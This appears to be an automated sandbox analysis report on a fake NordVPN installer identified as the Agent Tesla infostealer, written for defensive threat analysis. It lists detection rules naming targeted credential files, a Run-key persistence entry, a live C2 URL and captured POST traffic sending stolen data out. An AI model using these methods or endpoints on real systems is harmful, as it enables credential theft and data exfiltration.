Edit tour

Windows Analysis Report
NordVPNInstaller.exe

Overview

General Information

Sample name:	NordVPNInstaller.exe
Analysis ID:	1502485
MD5:	59acd8c97c40ed66cf5fcd0e0c010c6a
SHA1:	d3a5cb8dba49d929afe3b05687a3286b5db0b7c3
SHA256:	e4c05c4d5182791ce9f92e0c7da446c15bf65ac47e57e183d2fe83cc3c33c705
Tags:	exe
Infos:

Detection

Agent Tesla, AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected Agent Tesla keylogger

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected AntiVM3

.NET source code contains potential unpacker

AI detected suspicious sample

Contains functionality to capture screen (.Net source)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Moves itself to temp directory

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Stores large binary data to the registry

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

NordVPNInstaller.exe (PID: 3524 cmdline: "C:\Users\user\Desktop\NordVPNInstaller.exe" MD5: 59ACD8C97C40ED66CF5FCD0E0C010C6A)

dw20.exe (PID: 1228 cmdline: dw20.exe -x -s 12572 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

WerFault.exe (PID: 8580 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 12576 MD5: C31336C1EFC2CCB44B4326EA793040F2)

bbb.exe (PID: 1196 cmdline: "C:\Users\user\AppData\Roaming\bbb\bbb.exe" MD5: 59ACD8C97C40ED66CF5FCD0E0C010C6A)

bbb.exe (PID: 1516 cmdline: "C:\Users\user\AppData\Roaming\bbb\bbb.exe" MD5: 59ACD8C97C40ED66CF5FCD0E0C010C6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Web Panel", "C2 url": "https://plantain-elk-b8pt.squarespace.com/api/comment/FlagComment"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
NordVPNInstaller.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
NordVPNInstaller.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
NordVPNInstaller.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
NordVPNInstaller.exe	AgentTesla_1	AgentTesla Payload	kevoreilly	0x2584e:$string1: smtp 0x26f8e:$string1: smtp 0x24e4a:$string2: appdata 0x24f32:$string3: 76487-337-8429955-22614 0x24e7e:$string4: yyyy-MM-dd HH:mm:ss 0x24e2c:$string6: webpanel 0x259f7:$string7: <br>UserName      : 0x25fab:$string8: <br>IP Address  :
NordVPNInstaller.exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x29a38:$f1: FileZilla\recentservers.xml 0x29b44:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x28efc:$b1: Chrome\User Data\ 0x18160:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x1843c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x28f74:$b4: Opera Software\Opera Stable\Login Data 0x28fdc:$b5: YandexBrowser\User Data\ 0x1bc0c:$s4: logins.json 0x29050:$s4: logins.json 0x2a5d6:$s5: Account.CFN 0x2ad0e:$s6: wand.dat 0x28eb0:$a1: username_value 0x28ece:$a2: password_value 0x1bc60:$a3: encryptedUsername 0x290a4:$a3: encryptedUsername 0x2971e:$a3: encryptedUsername 0x1bc3c:$a4: encryptedPassword 0x29080:$a4: encryptedPassword 0x29742:$a4: encryptedPassword
NordVPNInstaller.exe	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x22cb0:$s1: get_kbHook 0x23fe2:$s2: GetPrivateProfileString 0x21ee7:$s3: get_OSFullName 0x22f65:$s4: get_PasswordHash 0x226cf:$s6: FtpWebRequest 0x1bc0c:$s7: logins 0x28f66:$s7: logins 0x29050:$s7: logins 0x294fe:$s7: logins 0x296fe:$s7: logins 0x2c77c:$s7: logins 0x25f2d:$s8: keylog
NordVPNInstaller.exe	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x1bc0c:$s10: logins 0x28f66:$s10: logins 0x29050:$s10: logins 0x294fe:$s10: logins 0x296fe:$s10: logins 0x2c77c:$s10: logins 0x22c81:$g1: get_Clipboard 0x22e2b:$g2: get_Keyboard 0x17574:$g3: get_Password 0x1aff2:$g3: get_Password 0x22f76:$g3: get_Password 0x22e50:$g4: get_CtrlKeyDown 0x22e72:$g5: get_ShiftKeyDown 0x22e41:$g6: get_AltKeyDown
Click to see the 2 entries

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\bbb\bbb.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Roaming\bbb\bbb.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Roaming\bbb\bbb.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Roaming\bbb\bbb.exe	AgentTesla_1	AgentTesla Payload	kevoreilly	0x2584e:$string1: smtp 0x26f8e:$string1: smtp 0x24e4a:$string2: appdata 0x24f32:$string3: 76487-337-8429955-22614 0x24e7e:$string4: yyyy-MM-dd HH:mm:ss 0x24e2c:$string6: webpanel 0x259f7:$string7: <br>UserName      : 0x25fab:$string8: <br>IP Address  :
C:\Users\user\AppData\Roaming\bbb\bbb.exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x29a38:$f1: FileZilla\recentservers.xml 0x29b44:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x28efc:$b1: Chrome\User Data\ 0x18160:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x1843c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x28f74:$b4: Opera Software\Opera Stable\Login Data 0x28fdc:$b5: YandexBrowser\User Data\ 0x1bc0c:$s4: logins.json 0x29050:$s4: logins.json 0x2a5d6:$s5: Account.CFN 0x2ad0e:$s6: wand.dat 0x28eb0:$a1: username_value 0x28ece:$a2: password_value 0x1bc60:$a3: encryptedUsername 0x290a4:$a3: encryptedUsername 0x2971e:$a3: encryptedUsername 0x1bc3c:$a4: encryptedPassword 0x29080:$a4: encryptedPassword 0x29742:$a4: encryptedPassword
C:\Users\user\AppData\Roaming\bbb\bbb.exe	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x22cb0:$s1: get_kbHook 0x23fe2:$s2: GetPrivateProfileString 0x21ee7:$s3: get_OSFullName 0x22f65:$s4: get_PasswordHash 0x226cf:$s6: FtpWebRequest 0x1bc0c:$s7: logins 0x28f66:$s7: logins 0x29050:$s7: logins 0x294fe:$s7: logins 0x296fe:$s7: logins 0x2c77c:$s7: logins 0x25f2d:$s8: keylog
C:\Users\user\AppData\Roaming\bbb\bbb.exe	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x1bc0c:$s10: logins 0x28f66:$s10: logins 0x29050:$s10: logins 0x294fe:$s10: logins 0x296fe:$s10: logins 0x2c77c:$s10: logins 0x22c81:$g1: get_Clipboard 0x22e2b:$g2: get_Keyboard 0x17574:$g3: get_Password 0x1aff2:$g3: get_Password 0x22f76:$g3: get_Password 0x22e50:$g4: get_CtrlKeyDown 0x22e72:$g5: get_ShiftKeyDown 0x22e41:$g6: get_AltKeyDown
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2765864520.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.1663885964.0000000000932000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.1663885964.0000000000932000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.3078215363.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: NordVPNInstaller.exe PID: 3524	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: NordVPNInstaller.exe PID: 3524	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: NordVPNInstaller.exe PID: 3524	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: NordVPNInstaller.exe PID: 3524	JoeSecurity_Agenttesla_Smtp_Variant	Yara detected AgentTesla	Joe Security
Process Memory Space: NordVPNInstaller.exe PID: 3524	agenttesla_smtp_variant	unknown	j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!	0x140d8:$a: type={ 0x1cf591:$a: type={ 0x1d5ada:$a: type={ 0x24315c:$a: type={ 0x100b5dd:$a: type={ 0x11554b6:$a: type={ 0x118211f:$a: type={ 0x11827d9:$a: type={ 0x118624e:$a: type={ 0x140e2:$b: hwid={ 0x1cf59b:$b: hwid={ 0x1d5ae4:$b: hwid={ 0x243166:$b: hwid={ 0x100b5e7:$b: hwid={ 0x11554c0:$b: hwid={ 0x1182129:$b: hwid={ 0x1186258:$b: hwid={ 0x140ec:$c: time={ 0x1cf5a5:$c: time={ 0x1d5aee:$c: time={ 0x243170:$c: time={
Process Memory Space: bbb.exe PID: 1196	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: bbb.exe PID: 1196	JoeSecurity_Agenttesla_Smtp_Variant	Yara detected AgentTesla	Joe Security
Process Memory Space: bbb.exe PID: 1196	agenttesla_smtp_variant	unknown	j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!	0x188845:$a: type={ 0x6b9b15:$a: type={ 0xe736a8:$a: type={ 0x18884f:$b: hwid={ 0x6b9b1f:$b: hwid={ 0xe736b2:$b: hwid={ 0x188859:$c: time={ 0x6b9b29:$c: time={ 0xe736bc:$c: time={ 0x188863:$d: pcname={ 0x6b9b33:$d: pcname={ 0xe736c6:$d: pcname={ 0x18886f:$e: logdata={ 0x6b9b3f:$e: logdata={ 0xe736d2:$e: logdata={ 0x18887c:$f: screen={ 0x6b9b4c:$f: screen={ 0xe736df:$f: screen={ 0x188888:$g: ipadd={ 0x6b9b58:$g: ipadd={ 0xe736eb:$g: ipadd={
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.NordVPNInstaller.exe.94af90.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.NordVPNInstaller.exe.94af90.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.0.NordVPNInstaller.exe.94af90.2.raw.unpack	AgentTesla_1	AgentTesla Payload	kevoreilly	0xc6be:$string1: smtp 0xddfe:$string1: smtp 0xbcba:$string2: appdata 0xbda2:$string3: 76487-337-8429955-22614 0xbcee:$string4: yyyy-MM-dd HH:mm:ss 0xbc9c:$string6: webpanel 0xc867:$string7: <br>UserName      : 0xce1b:$string8: <br>IP Address  :
0.0.NordVPNInstaller.exe.94af90.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x108a8:$f1: FileZilla\recentservers.xml 0x109b4:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0xfd6c:$b1: Chrome\User Data\ 0xfde4:$b4: Opera Software\Opera Stable\Login Data 0xfe4c:$b5: YandexBrowser\User Data\ 0x2a7c:$s4: logins.json 0xfec0:$s4: logins.json 0x11446:$s5: Account.CFN 0x11b7e:$s6: wand.dat 0xfd20:$a1: username_value 0xfd3e:$a2: password_value 0x2ad0:$a3: encryptedUsername 0xff14:$a3: encryptedUsername 0x1058e:$a3: encryptedUsername 0x2aac:$a4: encryptedPassword 0xfef0:$a4: encryptedPassword 0x105b2:$a4: encryptedPassword
0.0.NordVPNInstaller.exe.94af90.2.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x9b20:$s1: get_kbHook 0xae52:$s2: GetPrivateProfileString 0x8d57:$s3: get_OSFullName 0x9dd5:$s4: get_PasswordHash 0x953f:$s6: FtpWebRequest 0x2a7c:$s7: logins 0xfdd6:$s7: logins 0xfec0:$s7: logins 0x1036e:$s7: logins 0x1056e:$s7: logins 0x135ec:$s7: logins 0xcd9d:$s8: keylog
0.0.NordVPNInstaller.exe.94af90.2.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x2a7c:$s10: logins 0xfdd6:$s10: logins 0xfec0:$s10: logins 0x1036e:$s10: logins 0x1056e:$s10: logins 0x135ec:$s10: logins 0x9af1:$g1: get_Clipboard 0x9c9b:$g2: get_Keyboard 0x1e62:$g3: get_Password 0x9de6:$g3: get_Password 0x9cc0:$g4: get_CtrlKeyDown 0x9ce2:$g5: get_ShiftKeyDown 0x9cb1:$g6: get_AltKeyDown
0.0.NordVPNInstaller.exe.946cb8.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.NordVPNInstaller.exe.946cb8.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.NordVPNInstaller.exe.946cb8.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.0.NordVPNInstaller.exe.946cb8.1.raw.unpack	AgentTesla_1	AgentTesla Payload	kevoreilly	0x10996:$string1: smtp 0x120d6:$string1: smtp 0xff92:$string2: appdata 0x1007a:$string3: 76487-337-8429955-22614 0xffc6:$string4: yyyy-MM-dd HH:mm:ss 0xff74:$string6: webpanel 0x10b3f:$string7: <br>UserName      : 0x110f3:$string8: <br>IP Address  :
0.0.NordVPNInstaller.exe.946cb8.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x14b80:$f1: FileZilla\recentservers.xml 0x14c8c:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x14044:$b1: Chrome\User Data\ 0x32a8:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x3584:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x140bc:$b4: Opera Software\Opera Stable\Login Data 0x14124:$b5: YandexBrowser\User Data\ 0x6d54:$s4: logins.json 0x14198:$s4: logins.json 0x1571e:$s5: Account.CFN 0x15e56:$s6: wand.dat 0x13ff8:$a1: username_value 0x14016:$a2: password_value 0x6da8:$a3: encryptedUsername 0x141ec:$a3: encryptedUsername 0x14866:$a3: encryptedUsername 0x6d84:$a4: encryptedPassword 0x141c8:$a4: encryptedPassword 0x1488a:$a4: encryptedPassword
0.0.NordVPNInstaller.exe.946cb8.1.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0xddf8:$s1: get_kbHook 0xf12a:$s2: GetPrivateProfileString 0xd02f:$s3: get_OSFullName 0xe0ad:$s4: get_PasswordHash 0xd817:$s6: FtpWebRequest 0x6d54:$s7: logins 0x140ae:$s7: logins 0x14198:$s7: logins 0x14646:$s7: logins 0x14846:$s7: logins 0x178c4:$s7: logins 0x11075:$s8: keylog
0.0.NordVPNInstaller.exe.946cb8.1.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x6d54:$s10: logins 0x140ae:$s10: logins 0x14198:$s10: logins 0x14646:$s10: logins 0x14846:$s10: logins 0x178c4:$s10: logins 0xddc9:$g1: get_Clipboard 0xdf73:$g2: get_Keyboard 0x26bc:$g3: get_Password 0x613a:$g3: get_Password 0xe0be:$g3: get_Password 0xdf98:$g4: get_CtrlKeyDown 0xdfba:$g5: get_ShiftKeyDown 0xdf89:$g6: get_AltKeyDown
0.0.NordVPNInstaller.exe.930000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.NordVPNInstaller.exe.930000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.NordVPNInstaller.exe.930000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.0.NordVPNInstaller.exe.930000.0.unpack	AgentTesla_1	AgentTesla Payload	kevoreilly	0x2584e:$string1: smtp 0x26f8e:$string1: smtp 0x24e4a:$string2: appdata 0x24f32:$string3: 76487-337-8429955-22614 0x24e7e:$string4: yyyy-MM-dd HH:mm:ss 0x24e2c:$string6: webpanel 0x259f7:$string7: <br>UserName      : 0x25fab:$string8: <br>IP Address  :
0.0.NordVPNInstaller.exe.930000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x29a38:$f1: FileZilla\recentservers.xml 0x29b44:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x28efc:$b1: Chrome\User Data\ 0x18160:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x1843c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x28f74:$b4: Opera Software\Opera Stable\Login Data 0x28fdc:$b5: YandexBrowser\User Data\ 0x1bc0c:$s4: logins.json 0x29050:$s4: logins.json 0x2a5d6:$s5: Account.CFN 0x2ad0e:$s6: wand.dat 0x28eb0:$a1: username_value 0x28ece:$a2: password_value 0x1bc60:$a3: encryptedUsername 0x290a4:$a3: encryptedUsername 0x2971e:$a3: encryptedUsername 0x1bc3c:$a4: encryptedPassword 0x29080:$a4: encryptedPassword 0x29742:$a4: encryptedPassword
0.0.NordVPNInstaller.exe.930000.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x22cb0:$s1: get_kbHook 0x23fe2:$s2: GetPrivateProfileString 0x21ee7:$s3: get_OSFullName 0x22f65:$s4: get_PasswordHash 0x226cf:$s6: FtpWebRequest 0x1bc0c:$s7: logins 0x28f66:$s7: logins 0x29050:$s7: logins 0x294fe:$s7: logins 0x296fe:$s7: logins 0x2c77c:$s7: logins 0x25f2d:$s8: keylog
0.0.NordVPNInstaller.exe.930000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x1bc0c:$s10: logins 0x28f66:$s10: logins 0x29050:$s10: logins 0x294fe:$s10: logins 0x296fe:$s10: logins 0x2c77c:$s10: logins 0x22c81:$g1: get_Clipboard 0x22e2b:$g2: get_Keyboard 0x17574:$g3: get_Password 0x1aff2:$g3: get_Password 0x22f76:$g3: get_Password 0x22e50:$g4: get_CtrlKeyDown 0x22e72:$g5: get_ShiftKeyDown 0x22e41:$g6: get_AltKeyDown
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\bbb\bbb.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\NordVPNInstaller.exe, ProcessId: 3524, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyOtApp

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: NordVPNInstaller.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe

Avira: detection malicious, Label: TR/Spy.Agent.lkofd

Found malware configuration

Source: NordVPNInstaller.exe

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Web Panel", "C2 url": "https://plantain-elk-b8pt.squarespace.com/api/comment/FlagComment"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe

ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: NordVPNInstaller.exe	ReversingLabs: Detection: 63%
Source: NordVPNInstaller.exe	Virustotal: Detection: 56%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 94.6% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: NordVPNInstaller.exe

Joe Sandbox ML: detected

Source: NordVPNInstaller.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49734 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49746 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49781 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49780 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49790 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49792 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49793 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49820 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49821 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49822 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49869 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49870 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49872 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49873 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49871 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49878 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49879 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.4:49883 -> 198.185.159.177:443 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49889 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49890 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49890 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49891 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49892 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49896 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49895 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49901 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49900 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49899 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49904 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49903 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49902 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49910 version: TLS 1.0

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: NordVPNInstaller.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Admin\Desktop\IELibrary\IELibrary\obj\Debug\IELibrary.pdb source: NordVPNInstaller.exe, bbb.exe.0.dr
Source:	Binary string: r\VB.net\stealers\firefoxx64\firefox\obj\Debug\firefox.pdb source: NordVPNInstaller.exe, bbb.exe.0.dr

Networking

Yara detected Generic Downloader

Source: Yara match	File source: NordVPNInstaller.exe, type: SAMPLE
Source: Yara match	File source: 0.0.NordVPNInstaller.exe.946cb8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.NordVPNInstaller.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, type: DROPPED

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 198.185.159.177 198.185.159.177
Source: Joe Sandbox View	IP Address: 198.185.159.177 198.185.159.177
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View

ASN Name: SQUARESPACEUS SQUARESPACEUS

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown

DNS query: name: checkip.dyndns.org

Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 314Expect: 100-continue
